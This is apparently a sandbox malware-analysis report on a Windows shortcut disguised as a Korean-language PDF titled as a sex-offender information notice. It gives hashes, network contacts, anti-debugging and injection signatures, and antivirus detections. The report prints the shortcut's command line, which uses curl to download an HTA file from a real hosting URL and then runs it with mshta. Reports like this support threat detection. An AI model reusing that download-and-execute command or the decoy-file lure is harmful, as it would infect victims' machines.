Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	April 23, 2025, 1:26 p.m.	April 23, 2025, 1:31 p.m.

Size	1.5KB
Type	MS Windows shortcut, Item id list present, Points to a file or directory, Has command line arguments, Icon number=11, Archive, ctime=Sat Jul 27 14:38:47 2024, mtime=Sat Jul 27 14:38:47 2024, atime=Sat Jul 27 14:38:47 2024, length=323584, window=hidenormalshowminimized
MD5	`1d64508b384e928046887dd9cb32c2ac`
SHA256	`a66c25b1f0dea6e06a4c9f8c5f6ebba0f6c21bd3b9cc326a56702db30418f189`
CRC32	`FC7EFACA`
ssdeep	`24:8TJJJ9VhXyM+AcESKbKxeYqVAMvMmXE+habhOOUzltY+/vmF:8F1QESKblBaMvMmXEiajmYks`
Yara	Lnk_Format_Zero - LNK Format lnk_file_format - Microsoft Windows Shortcut File Format Generic_Malware_Zero - Generic Malware

Name	Response	Post-Analysis Lookup
cdn.glitch.global	CNAME j.sni.global.fastly.net A 146.75.50.132	151.101.66.132

IP Address	Status	Action
146.75.50.132	Active	Moloch
164.124.101.2	Active	Moloch

No Suricata Alerts

Flow	Issuer	Subject	Fingerprint
TLS 1.3 192.168.56.101:49167 146.75.50.132:443	None	None	None

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx April 23, 2025, 1:27 p.m.		1	1	0

Time & API	Arguments	Status	Return
bind April 23, 2025, 1:19 p.m.	ip_address: 127.0.0.1 socket: 144 port: 0	1	0
listen April 23, 2025, 1:19 p.m.	socket: 144 backlog: 1	1	0
accept April 23, 2025, 1:19 p.m.	ip_address: socket: 144 port: 0	1	152

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory April 23, 2025, 1:27 p.m.	process_identifier: 152 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73352000 process_handle: 0xffffffff	1	0	0

file	C:\Users\test22\AppData\Local\Temp\성범죄자 신상정보 고지.pdf.lnk

cmdline	"C:\Windows\System32\cmd.exe" /c cd /d C:\Users\test22\AppData\Local\Temp && curl -O https://cdn.glitch.global/2eefa6a0-44ff-4979-9a9c-689be652996d/sfmw.hta?v=2 && mshta C:\Users\test22\AppData\Local\Temp\sfmw.hta
cmdline	mshta C:\Users\test22\AppData\Local\Temp\sfmw.hta

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory April 23, 2025, 1:27 p.m.	process_identifier: 152 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x7ef90000 process_handle: 0xffffffff	1	0	0

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2540 resumed a thread in remote process 2656
NtResumeThread April 23, 2025, 1:26 p.m.	thread_handle: 0x00000334 suspend_count: 1 process_identifier: 2656	1	0	0

Lionic	Trojan.WinLNK.Nioc.4!c
CTX	lnk.trojan.nioc
CAT-QuickHeal	Html.Trojan.A14067327
Skyhigh	BehavesLike.Trojan.zr
ALYac	Trojan.Agent.LNK.Gen
VIPRE	Heur.BZC.YAX.Nioc.1.1CDCF038
Arcabit	Heur.BZC.YAX.Nioc.1.1CDCF038
Symantec	Trojan Horse
ESET-NOD32	LNK/Downloader.A suspicious
TrendMicro-HouseCall	TROJ_FRS.VSNTCP25
Avast	Other:Malware-gen [Trj]
Kaspersky	HEUR:Trojan.WinLNK.Agent.gen
BitDefender	Heur.BZC.YAX.Nioc.1.1CDCF038
MicroWorld-eScan	Heur.BZC.YAX.Nioc.1.1CDCF038
Rising	Downloader.Mshta/LNK!1.BADA (CLASSIC)
Emsisoft	Heur.BZC.YAX.Nioc.1.1CDCF038 (B)
TrendMicro	TROJ_FRS.VSNTCP25
SentinelOne	Static AI - Suspicious LNK
Google	Detected
ViRobot	LNK.S.Agent.1535
GData	Heur.BZC.YAX.Nioc.1.1CDCF038
Varist	LNK/ABTrojan.EJWN-
AhnLab-V3	Downloader/LNK.Generic.SC261280
McAfee	LNK/Agent.a
VBA32	suspected of Trojan.Link.URL
Zoner	Probably Heur.LNKScript
Tencent	Win32.Trojan.Agent.Iflw
huorong	TrojanDownloader/LNK.Agent.da
Fortinet	LNK/Agent.ACX!tr
AVG	Other:Malware-gen [Trj]
alibabacloud	Trojan[downloader]:Win/BZC.YMF

성범죄자 신상정보 고지.pdf.lnk